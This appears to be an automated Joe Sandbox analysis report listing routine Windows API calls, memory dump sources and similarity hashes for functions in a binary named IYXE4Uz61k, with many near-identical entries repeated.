• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 93239da3b539755467f8089375ee7b33e8f170e287dfaf56d908cd6e4704ee60
• Instruction ID: d90e24e9fd20928540b1bae1c3bf060c087779ce50d6d7262688580d4519abfc
• Opcode Fuzzy Hash: 93239da3b539755467f8089375ee7b33e8f170e287dfaf56d908cd6e4704ee60
• Instruction Fuzzy Hash: BE018C30A10790DAD725F7BCC0417DDFBA4EF64318F51848DA45AA3282DBB41B08DBA3
APIs
  • Part of subcall function 0087A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0087A592,000000FF,?,?), ref: 0087A6C4
  • Part of subcall function 0087A69B: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0087A592,000000FF,?,?), ref: 0087A6F2
  • Part of subcall function 0087A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0087A592,000000FF,?,?), ref: 0087A6FE
• FindClose.KERNEL32(00000000,000000FF,?,?), ref: 0087A598
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: Find$FileFirst$CloseErrorLast
• String ID:
• API String ID: 1464966427-0
• Opcode ID: efe5d0c8e8457e8aebdba9042be3d246f64db5401761d53bb93fd57586061068
• Instruction ID: 5e4d8048ae933c7091b94c3b1bfa382b6be18733678ac5cbba249090b1c5b2a9
• Opcode Fuzzy Hash: efe5d0c8e8457e8aebdba9042be3d246f64db5401761d53bb93fd57586061068
• Instruction Fuzzy Hash: B4F08931009790AACB6657F849047CF7B90BF66331F04CA4DF5FD9219AC37590949B23
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 00880E3D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExecutionStateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2211380416-0
                                                                                                                                                                                                    • Opcode ID: 5e1c322cd5b76c160fc64460dd462b253c50ae2429a287f56eee40489090c37a
                                                                                                                                                                                                    • Instruction ID: 0b1dffe86c163417c36c3c8711f0c73486cdb9769586cc5d40753e0d6fdae54c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EED0121161549556EE22332D686D7FF260AFFC6321F0D0065B14DDB686DE54888BA363
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 0088A62C
                                                                                                                                                                                                      • Part of subcall function 0088A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0088A3DA
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1915507550-0
                                                                                                                                                                                                    • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                                                                                                    • Instruction ID: cb720f395928d29a8b1cbc6feaad51c9aeee522ec4b933a82fdd7fe9ec0e5c0b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DDD0A93024020CBAEF0ABB65CC02A6E7A99FB10750F008022B842E52C1FBB1D910A363
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DloadProtectSection.DELAYIMP ref: 0088E5E3
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DloadProtectSection
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2203082970-0
                                                                                                                                                                                                    • Opcode ID: 2c7de1e22b1b7df03d9b08a144ce81a89464f2f8ca9287098315f28512f6ae04
                                                                                                                                                                                                    • Instruction ID: 852bc901022253e9dcdcc4ae456b822d28a47ce389ae1885bf4cfe2a8c218c4f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0D012B02D0251ABDB21FFACA84B7183354FB34704FD00212F155D19A5DB644480C706
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00881B3E), ref: 0088DD92
                                                                                                                                                                                                      • Part of subcall function 0088B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0088B579
                                                                                                                                                                                                      • Part of subcall function 0088B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0088B58A
                                                                                                                                                                                                      • Part of subcall function 0088B568: IsDialogMessageW.USER32(00010464,?), ref: 0088B59E
                                                                                                                                                                                                      • Part of subcall function 0088B568: TranslateMessage.USER32(?), ref: 0088B5AC
                                                                                                                                                                                                      • Part of subcall function 0088B568: DispatchMessageW.USER32(?), ref: 0088B5B6
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 897784432-0
                                                                                                                                                                                                    • Opcode ID: 54d03a80ac4a7c7e55063d3738b1975890ece6085c6410ba3420d3f41cacaeaa
                                                                                                                                                                                                    • Instruction ID: 61599233d7d9590aa4c50efcb3bf5bc04fa6276c75b563075f818052850829f8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9D09E32144300BADA023B55CD06F0A7BA6FB88B05F004655B284740B18772AE21DF16
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileType.KERNELBASE(000000FF,008797BE), ref: 008798C8
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileType
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3081899298-0
                                                                                                                                                                                                    • Opcode ID: 334cc958d0d09bc4afb8fe9b5e7e6413599e2e3e9bcd9e0ab8515fdd3ece4a4b
                                                                                                                                                                                                    • Instruction ID: fe1e0716b30a9074c94084f380f2630ec97ff703e964999d18c5c3855a8340d1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47C00234404605968E219A2598490A97722FA533A67B4D7E4D0ADC94A5C332CC97EA12
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 0977ed3d721b09250d3f71d68ba065528191a44191afe6909c259d4b86706f24
                                                                                                                                                                                                    • Instruction ID: 208646052632298e5ed5234f2018d1d3b519c4493421aa3087a888d031c648dd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0977ed3d721b09250d3f71d68ba065528191a44191afe6909c259d4b86706f24
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90B012D9358105BC310432891C07C3B120CF0C3B11330853FFC11C0981E840AD040933
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: ff19af8448a2aa4b554bde0c8daaa365bd76b7debd57ed69c7759377d0c56c14
                                                                                                                                                                                                    • Instruction ID: c97d1d40fb6918d8f3dac6a7f23423d53d48529660d5b19aa54f638f7ae5be52
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff19af8448a2aa4b554bde0c8daaa365bd76b7debd57ed69c7759377d0c56c14
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AFB012D935C10AAC3104738D1C07C3B120CF0C3B11330413FF815C0681E8406D040B33
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 120de78615a76024f880037dab2a637cdd631edc253d78828ed2245b565ebd99
                                                                                                                                                                                                    • Instruction ID: 3e437f564dd867cfa271075057aba9ff0bbd5c6b79f15a9b5e3fcaa828981b84
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 120de78615a76024f880037dab2a637cdd631edc253d78828ed2245b565ebd99
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EEB012D5358005AD310477491C07C3B121CF0C3B11330C13FFC15C0781E840AC080A33
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 9f51d41c7ad79a9f71b5e5984c5f118ca21085bd864208db1a0e435d12288b14
                                                                                                                                                                                                    • Instruction ID: 7fc6dc1378f53c0bfda2f3c9458fd3a1d257dce9530b551935952728f3aa916b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f51d41c7ad79a9f71b5e5984c5f118ca21085bd864208db1a0e435d12288b14
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46B012E9398005AC310472491D07C3B128CF0C3B11330413FF815C0681FC406D050A33
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 3f9bd84e1358d9139a8e7f2646df311d1eb6e48a15aaeefe0856fae60f86d805
                                                                                                                                                                                                    • Instruction ID: 572b4757a78d0dbcf89d3dc4c849e46440349291386f573164a06874600a8b13
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f9bd84e1358d9139a8e7f2646df311d1eb6e48a15aaeefe0856fae60f86d805
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3B012D5758006AC310473491C07C3B120CF0C2B11330453FF815C06C1E8406C040A33
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: fcceaa17cfbe3eb1141ec854e3e20fe165dc4409a9aebf159736ced3aa546796
                                                                                                                                                                                                    • Instruction ID: d968a5f3087013c2b9660c1ce9a00cafea778c642e7813b1951f9b8c4fa9dce4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcceaa17cfbe3eb1141ec854e3e20fe165dc4409a9aebf159736ced3aa546796
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9B012D5358005AD310473491D07C3B121CF0C2B11330813FF815C0781EC506D0D0A33
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: ad2a7e95e5192c8e286d6449a0aa9a2dd8770eedd298f01d2df455ae20460788
                                                                                                                                                                                                    • Instruction ID: 7d194658517c01ed7fdd31bbd3212f69d34ffd1a7213e65f9434d49fe3d433af
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ad2a7e95e5192c8e286d6449a0aa9a2dd8770eedd298f01d2df455ae20460788
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EBB012D5359045AC310472491C07C3F120DF0C3B11330813FFC15C0681E840EC040A33
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
